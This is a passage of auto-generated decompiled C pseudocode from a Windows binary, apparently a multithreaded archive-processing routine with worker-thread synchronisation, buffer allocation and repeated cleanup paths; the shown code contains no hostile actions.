										 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
										_push(0x10);
										 *(_t1186 - 4) = 3;
										_t654 = L004079F2();
										__eflags = _t654 - _t928;
										if(_t654 == _t928) {
											_t1172 = 0;
											__eflags = 0;
										} else {
											 *(_t654 + 4) = _t928;
											 *(_t654 + 0xc) = _t928;
											 *_t654 = 0x47b89c;
											_t1172 = _t654;
										}
										__eflags = _t1172 - _t928;
										 *((intOrPtr*)(_t1186 - 0x64)) = _t1172;
										 *((intOrPtr*)(_t1186 - 0x28)) = _t1172;
										if(_t1172 != _t928) {
											 *((intOrPtr*)( *_t1172 + 4))(_t1172);
										}
										_push(1);
										_push( *((intOrPtr*)(_t1186 + 0x1c)));
										 *(_t1186 - 4) = 4;
										E00441191(_t1172);
										L00443921(_t1186 - 0x13c);
										_push( *((intOrPtr*)(_t1172 + 0xc)));
										 *(_t1186 - 4) = 5;
										_push( *(_t1186 - 0x20));
										L0040F265(_t1186 - 0x13c);
										L0044295A(_t1186 - 0xe4, 0x10000);
										L00467C60(_t1186 - 0xd8);
										 *(_t1186 - 0xc0) = _t928;
										 *(_t1186 - 4) = 6;
										 *((intOrPtr*)(_t1186 - 0xbc)) = _t1186 - 0xe4;
										L00443B5C(_t1186 - 0xb8);
										 *(_t1186 - 4) = 7;
										L00443A5E(_t1186 - 0x90);
										 *(_t1186 - 4) = 8;
										E00404AD0(_t1186 - 0xa4, 4);
										 *((intOrPtr*)(_t1186 - 0xa4)) = 0x47a7f0;
										 *(_t1186 - 4) = 9;
										E00404AD0(_t1186 - 0x7c, 4);
										 *((intOrPtr*)(_t1186 - 0x7c)) = 0x47a668;
										 *(_t1186 - 4) = 0xa;
										_t1173 = E0040E850(_t1186 - 0xe4,  *(_t1186 - 0x20) << 9, _t928);
										__eflags = _t1173 - _t928;
										if(_t1173 == _t928) {
											_t1174 =  *((intOrPtr*)(_t1186 + 0x10));
											_t1158 = 0;
											__eflags =  *((intOrPtr*)(_t1174 + 8)) - _t928;
											if( *((intOrPtr*)(_t1174 + 8)) <= _t928) {
												L50:
												_t1175 =  *(_t1186 - 0x20);
												__eflags = _t1175 - _t928;
												if(_t1175 <= _t928) {
													L52:
													_t1159 = 0;
													__eflags =  *(_t1186 - 0x20) - _t928;
													if( *(_t1186 - 0x20) <= _t928) {
														L63:
														 *(_t1186 - 0x2c) =  *(_t1186 - 0x2c) | 0xffffffff;
														 *(_t1186 - 0x40) = _t928;
														 *(_t1186 - 0x38) = _t928;
														_t669 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 8));
														__eflags = _t669 - _t928;
														if(_t669 <= _t928) {
															L123:
															E00440D28( *((intOrPtr*)(_t1186 - 0x24)), _t1146, _t1186 - 0x5c,  *((intOrPtr*)(_t1186 + 0x18)));
															 *(_t1186 - 4) = 9;
															E00408604(_t1186 - 0x7c);
															 *(_t1186 - 4) = 8;
															E00408604(_t1186 - 0xa4);
															 *(_t1186 - 4) = 7;
															L00442DE5(_t1186 - 0x90);
															 *(_t1186 - 4) = 6;
															L00442E79(_t1186 - 0xbc);
															 *(_t1186 - 4) = 5;
															L0044296D(_t1186 - 0xe4);
															 *(_t1186 - 4) = 4;
															L0044395A(_t1186 - 0x13c, __eflags);
															 *(_t1186 - 4) = 3;
															L0043361B(_t1186 - 0x28);
															 *(_t1186 - 4) = 2;
															L00443C57(_t1186 - 0x5c);
															goto L124;
														} else {
															goto L64;
														}
														do {
															L64:
															__eflags =  *((intOrPtr*)(_t1186 - 0x74)) -  *(_t1186 - 0x20);
															if( *((intOrPtr*)(_t1186 - 0x74)) >=  *(_t1186 - 0x20)) {
																L95:
																_t681 =  *(_t1186 - 0x38) << 2;
																 *(_t1186 - 0x1c) = _t681;
																_t963 =  *((intOrPtr*)(_t681 +  *((intOrPtr*)(_t1186 - 0xac))));
																__eflags =  *((intOrPtr*)(_t963 + 0x41)) - _t928;
																if( *((intOrPtr*)(_t963 + 0x41)) == _t928) {
																	_t1160 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 0xc)) + _t681));
																	L0044375C(_t1186 - 0x294);
																	__eflags =  *((intOrPtr*)(_t1160 + 1)) - _t928;
																	 *(_t1186 - 4) = 0x18;
																	if( *((intOrPtr*)(_t1160 + 1)) == _t928) {
																		L99:
																		L00443768(_t1186 - 0x294,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0xc)) + 0xc)) +  *(_t1160 + 8) * 4)));
																		_push(_t1186 - 0x294);
																		__eflags = L0043F571( *((intOrPtr*)(_t1186 - 0x60)), _t1146);
																		if(__eflags != 0) {
																			_t1176 = 0x80004001;
																			L146:
																			 *(_t1186 - 4) = 0xa;
																			E0043CD47(_t1186 - 0x294, __eflags);
																			 *(_t1186 - 4) = 9;
																			E00408604(_t1186 - 0x7c);
																			 *(_t1186 - 4) = 8;
																			E00408604(_t1186 - 0xa4);
																			 *(_t1186 - 4) = 7;
																			L00442DE5(_t1186 - 0x90);
																			 *(_t1186 - 4) = 6;
																			L00442E79(_t1186 - 0xbc);
																			 *(_t1186 - 4) = 5;
																			L0044296D(_t1186 - 0xe4);
																			 *(_t1186 - 4) = 4;
																			L0044395A(_t1186 - 0x13c, __eflags);
																			 *(_t1186 - 4) = 3;
																			L0043361B(_t1186 - 0x28);
																			L147:
																			 *(_t1186 - 4) = 2;
																			L00443C57(_t1186 - 0x5c);
																			L148:
																			 *(_t1186 - 4) = 1;
																			E0043E0CB(_t1186 - 0x2ec);
																			 *(_t1186 - 4) =  *(_t1186 - 4) | 0xffffffff;
																			L00442D78(_t1186 - 0x3ac);
																			_t650 = _t1176;
																			goto L125;
																		}
																		__eflags =  *_t1160 - _t928;
																		if( *_t1160 == _t928) {
																			_t1146 =  *(_t1186 + 8);
																			_t700 = L00442EE9( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 8), _t1160, _t1186 - 0x294,  *((intOrPtr*)(_t1186 - 0x28)), _t1186 - 0x18);
																			__eflags = _t700 - _t928;
																			if(__eflags != 0) {
																				L145:
																				_t1176 = _t700;
																				goto L146;
																			}
																			L119:
																			_push(_t1186 - 0x294);
																			L00443C8F(_t1186 - 0x5c);
																			 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + 0x1a;
																			asm("adc [ebp-0x14], ebx");
																			E00441083( *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x64)) + 8)),  *(_t1186 - 0x18),  *(_t1186 - 0x14));
																			_t494 = _t1186 - 0x38;
																			 *_t494 =  *(_t1186 - 0x38) + 1;
																			__eflags =  *_t494;
																			L120:
																			 *(_t1186 - 4) = 0xa;
																			_t985 = _t1186 - 0x294;
																			L121:
																			E0043CD47(_t985, __eflags);
																			goto L122;
																		}
																		L101:
																		__eflags =  *((intOrPtr*)(_t1160 + 1)) - _t928;
																		if( *((intOrPtr*)(_t1160 + 1)) == _t928) {
																			_t790 = E00440593(_t1186 - 0x294);
																		} else {
																			_t790 =  *((intOrPtr*)(_t1160 + 2));
																		}
																		__eflags = _t790 - _t928;
																		if(_t790 == _t928) {
																			__eflags =  *(_t1186 - 0x2c) -  *(_t1186 - 0x38);
																			if( *(_t1186 - 0x2c) >=  *(_t1186 - 0x38)) {
																				_t1178 =  *(_t1186 + 0x14);
																			} else {
																				_t1178 =  *(_t1186 + 0x14);
																				 *(_t1186 - 0x2c) =  *(_t1186 - 0x38);
																				_t1146 = _t1178;
																				L00442B0A( *((intOrPtr*)(_t1186 - 0x24)), _t1178, _t1160, _t1186 - 0x294);
																				E0044072C( *((intOrPtr*)(_t1186 - 0x270)),  *((intOrPtr*)(_t1160 + 0x18)),  *((intOrPtr*)(_t1160 + 0x1c)),  *((intOrPtr*)(_t1178 + 0x54)));
																			}
																			_t793 =  *( *(_t1186 - 0x1c) +  *((intOrPtr*)(_t1186 - 0xac)));
																			 *(_t1186 - 0x68) = _t793;
																			__eflags =  *((intOrPtr*)(_t793 + 0x40)) - _t928;
																			if( *((intOrPtr*)(_t793 + 0x40)) == _t928) {
																				_t1179 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) +  *( *(_t1186 - 0x70)) * 4));
																				_t796 =  *((intOrPtr*)(_t1179 + 0x18));
																				__eflags =  *((intOrPtr*)(_t796 + 0x15)) - _t928;
																				if( *((intOrPtr*)(_t796 + 0x15)) == _t928) {
																					 *(_t1186 - 0x44) = _t928;
																					_push(_t1186 - 0x44);
																					 *(_t1186 - 4) = 0x1a;
																					E00440F0D( *((intOrPtr*)(_t1186 - 0x24)));
																					L00442A14( *((intOrPtr*)(_t1179 + 0x18)),  *(_t1186 - 0x44));
																					 *((char*)( *((intOrPtr*)(_t1179 + 0x18)) + 0x15)) = 1;
																					L00467B10( *((intOrPtr*)(_t1179 + 0x18)) + 0x1c);
																					 *(_t1186 - 4) = 0x18;
																					L0043361B(_t1186 - 0x44);
																				}
																				_t797 = WaitForMultipleObjects( *(_t1186 - 0x9c),  *(_t1186 - 0x98), _t928, 0xffffffff);
																				 *(_t1186 - 0x1c) = _t797;
																				_t1180 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) + ( *(_t1186 - 0x70))[_t797] * 4));
																				L00437D6C(_t1180 + 0x20);
																				_t700 =  *(_t1180 + 0x9c);
																				 *((char*)(_t1180 + 0xb8)) = 1;
																				__eflags = _t700 - _t928;
																				if(__eflags != 0) {
																					goto L145;
																				} else {
																					E00408784(_t1186 - 0x7c,  *(_t1186 - 0x1c), 1);
																					E00408784(_t1186 - 0xa4,  *(_t1186 - 0x1c), 1);
																					__eflags =  *(_t1186 - 0x1c) - _t928;
																					if(__eflags != 0) {
																						_t1165 =  *( *((intOrPtr*)(_t1186 - 0xac)) +  *(_t1180 + 0xbc) * 4);
																						 *(_t1186 - 0x1c) = _t1165;
																						L0040F015( *(_t1180 + 0x18), __eflags, _t1165);
																						_t996 = 6;
																						_t805 = memcpy(_t1165 + 0x28, _t1180 + 0xa0, _t996 << 2);
																						_t1189 = _t1189 + 0xc;
																						 *((char*)(_t805 + 0x40)) = 1;
																						goto L120;
																					}
																					_t700 = L0040F032( *(_t1180 + 0x18));
																					__eflags = _t700 - _t928;
																					if(__eflags != 0) {
																						goto L145;
																					}
																					 *(_t1186 - 0x1c) =  *(_t1180 + 0x18);
																					L00437D6C( *(_t1180 + 0x18) + 0x54);
																					L00437D6C( *(_t1186 - 0x1c) + 0x50);
																					_push(_t1186 - 0x294);
																					_push( *((intOrPtr*)( *(_t1186 + 0x14) + 0x55)));
																					L00442BEC(_t1180 + 0xa0,  *((intOrPtr*)( *(_t1186 + 0x14) + 0x54)));
																					_t1146 =  *(_t1186 + 0x14);
																					L00442B0A( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14), _t1160, _t1186 - 0x294);
																					_push(_t1186 - 0x294);
																					E004408BF( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14));
																					goto L119;
																				}
																			} else {
																				 *(_t1186 - 0x1c) = _t928;
																				_push(_t1186 - 0x1c);
																				 *(_t1186 - 4) = 0x19;
																				E00440F0D( *((intOrPtr*)(_t1186 - 0x24)));
																				L0040E94A( *(_t1186 - 0x68),  *((intOrPtr*)(_t1186 - 0xe0)),  *(_t1186 - 0x1c));
																				_push(_t1186 - 0x294);
																				_push( *((intOrPtr*)(_t1178 + 0x55)));
																				L00442BEC( *(_t1186 - 0x68) + 0x28,  *((intOrPtr*)(_t1178 + 0x54)));
																				_t1146 = _t1178;
																				L00442B0A( *((intOrPtr*)(_t1186 - 0x24)), _t1178, _t1160, _t1186 - 0x294);
																				_push(_t1186 - 0x294);
																				E004408BF( *((intOrPtr*)(_t1186 - 0x24)), _t1178);
																				L0040E933( *(_t1186 - 0x68), _t1160, _t1186 - 0xe4);
																				 *(_t1186 - 4) = 0x18;
																				L0043361B(_t1186 - 0x1c);
																				goto L119;
																			}
																		} else {
																			_t1146 =  *(_t1186 + 0x14);
																			L004431F3( *((intOrPtr*)(_t1186 - 0x24)),  *(_t1186 + 0x14), _t1160, _t1186 - 0x294);
																			goto L119;
																		}
																	}
																	__eflags =  *_t1160 - _t928;
																	if( *_t1160 != _t928) {
																		goto L101;
																	}
																	goto L99;
																}
																 *(_t1186 - 0x38) =  *(_t1186 - 0x38) + 1;
																goto L122;
															}
															__eflags =  *(_t1186 - 0x40) - _t669;
															if( *(_t1186 - 0x40) >= _t669) {
																goto L95;
															}
															 *(_t1186 - 0x40) =  *(_t1186 - 0x40) + 1;
															_t1177 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 0xc)) + ( *(_t1186 - 0x40) << 2)));
															__eflags =  *_t1177 - _t928;
															if(__eflags == 0) {
																goto L122;
															}
															L0043F39F(_t1186 - 0x1d4, __eflags);
															__eflags =  *((intOrPtr*)(_t1177 + 1)) - _t928;
															 *(_t1186 - 4) = 0x12;
															if( *((intOrPtr*)(_t1177 + 1)) == _t928) {
																_t1161 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0xc)) + 0xc)) +  *(_t1177 + 8) * 4));
																L00443797(_t1186 - 0x1d4, _t1161);
																 *((intOrPtr*)(_t1186 - 0x144)) =  *((intOrPtr*)(_t1161 + 0x90));
																 *(_t1186 - 0x140) =  *((intOrPtr*)(_t1161 + 0x94));
																_push(_t1186 - 0x1d4);
																__eflags = L0043F571( *((intOrPtr*)(_t1186 - 0x60)), _t1146);
																if(__eflags != 0) {
																	 *(_t1186 - 4) = 0xa;
																	E0043CD47(_t1186 - 0x1d4, __eflags);
																	 *(_t1186 - 4) = 9;
																	E00408604(_t1186 - 0x7c);
																	 *(_t1186 - 4) = 8;
																	E00408604(_t1186 - 0xa4);
																	 *(_t1186 - 4) = 7;
																	L00442DE5(_t1186 - 0x90);
																	 *(_t1186 - 4) = 6;
																	L00442E79(_t1186 - 0xbc);
																	 *(_t1186 - 4) = 5;
																	L0044296D(_t1186 - 0xe4);
																	 *(_t1186 - 4) = 4;
																	L0044395A(_t1186 - 0x13c, __eflags);
																	_t723 =  *((intOrPtr*)(_t1186 - 0x28));
																	 *(_t1186 - 4) = 3;
																	__eflags = _t723 - _t928;
																	if(_t723 != _t928) {
																		 *((intOrPtr*)( *_t723 + 8))(_t723);
																	}
																	 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																	 *(_t1186 - 4) = 0x13;
																	E0040862D();
																	 *(_t1186 - 4) = 2;
																	E00408604(_t1186 - 0x5c);
																	_t1176 = 0x80004001;
																	goto L148;
																}
																__eflags = E00440593(_t1186 - 0x1d4);
																if(__eflags != 0) {
																	L94:
																	 *(_t1186 - 4) = 0xa;
																	_t985 = _t1186 - 0x1d4;
																	goto L121;
																}
																L81:
																 *(_t1186 - 0x34) = _t928;
																_t1163 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x64)) + 8)) + 0x3c;
																 *(_t1186 - 0x68) = _t1163;
																EnterCriticalSection(_t1163);
																_t729 =  *((intOrPtr*)(_t1186 + 0x1c));
																_t1146 = _t1186 - 0x34;
																 *(_t1186 - 4) = 0x15;
																_t730 =  *((intOrPtr*)( *_t729 + 0x1c))(_t729,  *((intOrPtr*)(_t1177 + 0xc)), _t1186 - 0x34);
																__eflags = _t730 - 1;
																 *(_t1186 - 0x1c) = _t730;
																if(_t730 != 1) {
																	_t1176 =  *(_t1186 - 0x1c);
																	__eflags = _t1176 - _t928;
																	if(_t1176 != _t928) {
																		LeaveCriticalSection(_t1163);
																		_t731 =  *(_t1186 - 0x34);
																		 *(_t1186 - 4) = 0x12;
																		__eflags = _t731 - _t928;
																		if(__eflags != 0) {
																			 *((intOrPtr*)( *_t731 + 8))(_t731);
																		}
																		 *(_t1186 - 4) = 0xa;
																		E0043CD47(_t1186 - 0x1d4, __eflags);
																		 *(_t1186 - 4) = 9;
																		E00408604(_t1186 - 0x7c);
																		 *(_t1186 - 4) = 8;
																		E00408604(_t1186 - 0xa4);
																		 *(_t1186 - 4) = 7;
																		L00442DE5(_t1186 - 0x90);
																		 *(_t1186 - 4) = 6;
																		L00442E79(_t1186 - 0xbc);
																		 *(_t1186 - 4) = 5;
																		L0044296D(_t1186 - 0xe4);
																		 *(_t1186 - 4) = 4;
																		L0044395A(_t1186 - 0x13c, __eflags);
																		_t739 =  *((intOrPtr*)(_t1186 - 0x28));
																		 *(_t1186 - 4) = 3;
																		__eflags = _t739 - _t928;
																		if(_t739 != _t928) {
																			 *((intOrPtr*)( *_t739 + 8))(_t739);
																		}
																		 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																		 *(_t1186 - 4) = 0x17;
																		L134:
																		E0040862D();
																		 *(_t1186 - 4) = 2;
																		E00408604(_t1186 - 0x5c);
																		goto L148;
																	}
																	_t744 =  *((intOrPtr*)(_t1186 + 0x1c));
																	_t1176 =  *((intOrPtr*)( *_t744 + 0x20))(_t744, _t928);
																	__eflags = _t1176 - _t928;
																	if(_t1176 != _t928) {
																		LeaveCriticalSection(_t1163);
																		_t746 =  *(_t1186 - 0x34);
																		 *(_t1186 - 4) = 0x12;
																		__eflags = _t746 - _t928;
																		if(__eflags != 0) {
																			 *((intOrPtr*)( *_t746 + 8))(_t746);
																		}
																		 *(_t1186 - 4) = 0xa;
																		E0043CD47(_t1186 - 0x1d4, __eflags);
																		 *(_t1186 - 4) = 9;
																		E00408604(_t1186 - 0x7c);
																		 *(_t1186 - 4) = 8;
																		E00408604(_t1186 - 0xa4);
																		 *(_t1186 - 4) = 7;
																		L00442DE5(_t1186 - 0x90);
																		 *(_t1186 - 4) = 6;
																		L00442E79(_t1186 - 0xbc);
																		 *(_t1186 - 4) = 5;
																		L0044296D(_t1186 - 0xe4);
																		 *(_t1186 - 4) = 4;
																		L0044395A(_t1186 - 0x13c, __eflags);
																		_t754 =  *((intOrPtr*)(_t1186 - 0x28));
																		 *(_t1186 - 4) = 3;
																		__eflags = _t754 - _t928;
																		if(_t754 != _t928) {
																			 *((intOrPtr*)( *_t754 + 8))(_t754);
																		}
																		goto L147;
																	}
																	 *(_t1186 - 4) = 0x14;
																	LeaveCriticalSection(_t1163);
																	_t1164 = 0;
																	__eflags =  *(_t1186 - 0x20) - _t928;
																	if( *(_t1186 - 0x20) <= _t928) {
																		L93:
																		 *(_t1186 - 4) = 0x12;
																		L0043361B(_t1186 - 0x34);
																		goto L94;
																	}
																	_t758 =  *((intOrPtr*)(_t1186 - 0x84));
																	while(1) {
																		_t1182 =  *_t758;
																		__eflags =  *(_t1182 + 0xb8) - _t928;
																		if( *(_t1182 + 0xb8) != _t928) {
																			break;
																		}
																		_t1164 = _t1164 + 1;
																		_t758 = _t758 + 4;
																		__eflags = _t1164 -  *(_t1186 - 0x20);
																		if(_t1164 <  *(_t1186 - 0x20)) {
																			continue;
																		}
																		goto L93;
																	}
																	 *(_t1182 + 0xb8) = _t928;
																	_t341 = _t1182 + 0x20; // 0x20
																	E0040C9B4(_t341,  *(_t1186 - 0x34));
																	L00437D6C(_t1186 - 0x34);
																	L0040EFF1( *((intOrPtr*)(_t1182 + 0x18)));
																	L0040F2EB( *((intOrPtr*)( *((intOrPtr*)(_t1182 + 0x10)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t1182 + 0x10)) + 0xc)));
																	_t347 = _t1182 + 4; // 0x4
																	L00467B10(_t347);
																	_t766 =  *(_t1186 - 0x40) - 1;
																	__eflags = _t766;
																	 *(_t1182 + 0xbc) = _t766;
																	E00415C6D(_t1186 - 0xa4,  *((intOrPtr*)(_t1182 + 8)));
																	E00415C6D(_t1186 - 0x7c, _t1164);
																	goto L93;
																}
																asm("adc ecx, ebx");
																 *(_t1186 - 0x18) =  *(_t1186 - 0x18) +  *((intOrPtr*)(_t1177 + 0x18)) + 0x1a;
																asm("adc [ebp-0x14], ecx");
																E00441083( *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x64)) + 8)),  *(_t1186 - 0x18),  *(_t1186 - 0x14));
																_t773 =  *((intOrPtr*)(_t1186 + 0x1c));
																_t1176 =  *((intOrPtr*)( *_t773 + 0x20))(_t773, _t928);
																__eflags = _t1176 - _t928;
																if(_t1176 != _t928) {
																	LeaveCriticalSection(_t1163);
																	_t775 =  *(_t1186 - 0x34);
																	 *(_t1186 - 4) = 0x12;
																	__eflags = _t775 - _t928;
																	if(__eflags != 0) {
																		 *((intOrPtr*)( *_t775 + 8))(_t775);
																	}
																	 *(_t1186 - 4) = 0xa;
																	E0043CD47(_t1186 - 0x1d4, __eflags);
																	 *(_t1186 - 4) = 9;
																	E00408604(_t1186 - 0x7c);
																	 *(_t1186 - 4) = 8;
																	E00408604(_t1186 - 0xa4);
																	 *(_t1186 - 4) = 7;
																	L00442DE5(_t1186 - 0x90);
																	 *(_t1186 - 4) = 6;
																	L00442E79(_t1186 - 0xbc);
																	 *(_t1186 - 4) = 5;
																	L0044296D(_t1186 - 0xe4);
																	 *(_t1186 - 4) = 4;
																	L0044395A(_t1186 - 0x13c, __eflags);
																	_t783 =  *((intOrPtr*)(_t1186 - 0x28));
																	 *(_t1186 - 4) = 3;
																	__eflags = _t783 - _t928;
																	if(_t783 != _t928) {
																		 *((intOrPtr*)( *_t783 + 8))(_t783);
																	}
																	 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																	 *(_t1186 - 4) = 0x16;
																	goto L134;
																}
																 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0xac)) +  *(_t1186 - 0x40) * 4 - 4)) + 0x41)) = 1;
																LeaveCriticalSection(_t1163);
																_t788 =  *(_t1186 - 0x34);
																 *(_t1186 - 4) = 0x12;
																__eflags = _t788 - _t928;
																if(__eflags != 0) {
																	 *((intOrPtr*)( *_t788 + 8))(_t788);
																}
																goto L94;
															}
															__eflags =  *((intOrPtr*)(_t1177 + 2)) - _t928;
															if(__eflags == 0) {
																goto L81;
															}
															goto L94;
															L122:
															_t669 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 8));
															__eflags =  *(_t1186 - 0x38) - _t669;
														} while ( *(_t1186 - 0x38) < _t669);
														goto L123;
													} else {
														goto L53;
													}
													while(1) {
														L53:
														_t1183 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 - 0x84)) + _t1159 * 4));
														_t845 = L00442D4F(_t1183);
														__eflags = _t845 - _t928;
														 *(_t1186 - 0x2c) = _t845;
														if(_t845 != _t928) {
															break;
														}
														_push(0x58);
														_t856 = L004079F2();
														 *(_t1186 - 0x2c) = _t856;
														__eflags = _t856 - _t928;
														 *(_t1186 - 4) = 0xf;
														if(_t856 == _t928) {
															_t857 = 0;
															__eflags = 0;
														} else {
															_t857 = L00442A33(_t856, _t1186 - 0xe4);
														}
														 *(_t1186 - 4) = 0xa;
														 *((intOrPtr*)(_t1183 + 0x18)) = _t857;
														_t858 = L004429EB(_t857);
														__eflags = _t858 - _t928;
														 *(_t1186 - 0x2c) = _t858;
														if(_t858 != _t928) {
															 *(_t1186 - 4) = 9;
															E00408604(_t1186 - 0x7c);
															 *(_t1186 - 4) = 8;
															E00408604(_t1186 - 0xa4);
															 *(_t1186 - 4) = 7;
															L00442DE5(_t1186 - 0x90);
															 *(_t1186 - 4) = 6;
															L00442E79(_t1186 - 0xbc);
															 *(_t1186 - 4) = 5;
															L0044296D(_t1186 - 0xe4);
															 *(_t1186 - 4) = 4;
															L0044395A(_t1186 - 0x13c, __eflags);
															_t865 =  *((intOrPtr*)(_t1186 - 0x28));
															 *(_t1186 - 4) = 3;
															__eflags = _t865 - _t928;
															if(_t865 != _t928) {
																 *((intOrPtr*)( *_t865 + 8))(_t865);
															}
															 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
															 *(_t1186 - 4) = 0x10;
															E0040862D();
															 *(_t1186 - 4) = 2;
															E00408604(_t1186 - 0x5c);
															_t928 =  *(_t1186 - 0x2c);
															goto L124;
														} else {
															E0040C9B4(_t1183 + 0x1c,  *((intOrPtr*)(_t1183 + 0x18)));
															 *((char*)(_t1183 + 0xb8)) = 1;
															_push(0x10);
															_t870 = L004079F2();
															__eflags = _t870 - _t928;
															if(_t870 == _t928) {
																_t870 = 0;
																__eflags = 0;
															} else {
																 *(_t870 + 4) = _t928;
																 *_t870 = 0x47b88c;
															}
															 *((intOrPtr*)(_t1183 + 0x10)) = _t870;
															E0040C9B4(_t1183 + 0x14, _t870);
															_t872 =  *((intOrPtr*)(_t1183 + 0x10));
															_t1146 = 0x442dd7;
															 *((intOrPtr*)(_t872 + 8)) = _t1186 - 0x13c;
															 *(_t872 + 0xc) = _t1159;
															_t1173 = E00467AD0(_t1183, 0x442dd7, _t1183);
															__eflags = _t1173 - _t928;
															if(_t1173 != _t928) {
																 *(_t1186 - 4) = 9;
																E00408604(_t1186 - 0x7c);
																 *(_t1186 - 4) = 8;
																E00408604(_t1186 - 0xa4);
																 *(_t1186 - 4) = 7;
																L00442DE5(_t1186 - 0x90);
																 *(_t1186 - 4) = 6;
																L00442E79(_t1186 - 0xbc);
																 *(_t1186 - 4) = 5;
																L0044296D(_t1186 - 0xe4);
																 *(_t1186 - 4) = 4;
																L0044395A(_t1186 - 0x13c, __eflags);
																_t880 =  *((intOrPtr*)(_t1186 - 0x28));
																 *(_t1186 - 4) = 3;
																__eflags = _t880 - _t928;
																if(_t880 != _t928) {
																	 *((intOrPtr*)( *_t880 + 8))(_t880);
																}
																 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
																 *(_t1186 - 4) = 0x11;
																goto L47;
															} else {
																_t1159 = _t1159 + 1;
																__eflags = _t1159 -  *(_t1186 - 0x20);
																if(_t1159 <  *(_t1186 - 0x20)) {
																	continue;
																}
																goto L63;
															}
														}
													}
													 *(_t1186 - 4) = 9;
													E00408604(_t1186 - 0x7c);
													 *(_t1186 - 4) = 8;
													E00408604(_t1186 - 0xa4);
													 *(_t1186 - 4) = 7;
													L00442DE5(_t1186 - 0x90);
													 *(_t1186 - 4) = 6;
													L00442E79(_t1186 - 0xbc);
													 *(_t1186 - 4) = 5;
													L0044296D(_t1186 - 0xe4);
													 *(_t1186 - 4) = 4;
													L0044395A(_t1186 - 0x13c, __eflags);
													_t852 =  *((intOrPtr*)(_t1186 - 0x28));
													 *(_t1186 - 4) = 3;
													__eflags = _t852 - _t928;
													if(_t852 != _t928) {
														 *((intOrPtr*)( *_t852 + 8))(_t852);
													}
													 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
													 *(_t1186 - 4) = 0xe;
													E0040862D();
													 *(_t1186 - 4) = 2;
													E00408604(_t1186 - 0x5c);
													_t928 =  *(_t1186 - 0x2c);
													goto L124;
												} else {
													goto L51;
												}
												do {
													L51:
													_push(_t1186 - 0x2ec);
													_push(L00442CFF(_t1186 - 0x1fc));
													 *(_t1186 - 4) = 0xd;
													L00443AB1(_t1186 - 0x90);
													 *(_t1186 - 4) = 0xa;
													L004439AD(_t1186 - 0x1fc);
													_t1175 = _t1175 - 1;
													__eflags = _t1175;
												} while (_t1175 != 0);
												goto L52;
											} else {
												goto L49;
											}
											do {
												L49:
												L004429C6(_t1186 - 0x334);
												 *(_t1186 - 0x2f4) = _t928;
												 *(_t1186 - 0x2f3) = _t928;
												_push(_t1186 - 0x334);
												 *(_t1186 - 4) = 0xc;
												L00443BAF(_t1186 - 0xb8);
												 *(_t1186 - 4) = 0xa;
												E00408604(_t1186 - 0x334);
												_t1158 = _t1158 + 1;
												__eflags = _t1158 -  *((intOrPtr*)(_t1174 + 8));
											} while (_t1158 <  *((intOrPtr*)(_t1174 + 8)));
											goto L50;
										} else {
											 *(_t1186 - 4) = 9;
											E00408604(_t1186 - 0x7c);
											 *(_t1186 - 4) = 8;
											E00408604(_t1186 - 0xa4);
											 *(_t1186 - 4) = 7;
											L00442DE5(_t1186 - 0x90);
											 *(_t1186 - 4) = 6;
											L00442E79(_t1186 - 0xbc);
											 *(_t1186 - 4) = 5;
											L0044296D(_t1186 - 0xe4);
											 *(_t1186 - 4) = 4;
											L0044395A(_t1186 - 0x13c, __eflags);
											_t898 =  *((intOrPtr*)(_t1186 - 0x28));
											 *(_t1186 - 4) = 3;
											__eflags = _t898 - _t928;
											if(_t898 != _t928) {
												 *((intOrPtr*)( *_t898 + 8))(_t898);
											}
											 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
											 *(_t1186 - 4) = 0xb;
											L47:
											E0040862D();
											 *(_t1186 - 4) = 2;
											E00408604(_t1186 - 0x5c);
											_t928 = _t1173;
											L124:
											 *(_t1186 - 4) = 1;
											E0043E0CB(_t1186 - 0x2ec);
											 *(_t1186 - 4) =  *(_t1186 - 4) | 0xffffffff;
											L00442D78(_t1186 - 0x3ac);
											_t650 = _t928;
											L125:
											 *[fs:0x0] =  *((intOrPtr*)(_t1186 - 0xc));
											return _t650;
										}
									}
									goto L37;
								}
								_t904 = L0046B300( *((intOrPtr*)(_t1186 - 0x48)),  *(_t1186 - 0x44),  *((intOrPtr*)(_t1186 - 0x30)),  *(_t1186 - 0x2c));
								_t1134 =  *(_t1170 + 0x34);
								if( *(_t1170 + 0x34) == _t928) {
									_t1134 = _t1155;
								}
								_t905 = L0046B300(_t904, _t1146, _t1134, _t928);
								_t1205 = _t1146 - _t928;
								_t1135 = 0x20;
								if(_t1205 > 0 || _t1205 >= 0 && _t905 >= _t1135) {
									_t1155 = 1;
								} else {
									_t1135 = _t905;
									_t1155 = 1;
									if(_t905 < _t1155) {
										_t1135 = _t1155;
									}
								}
								_t906 =  *(_t1186 - 0x20);
								_t907 = _t906 / _t1135;
								_t1146 = _t906 % _t1135;
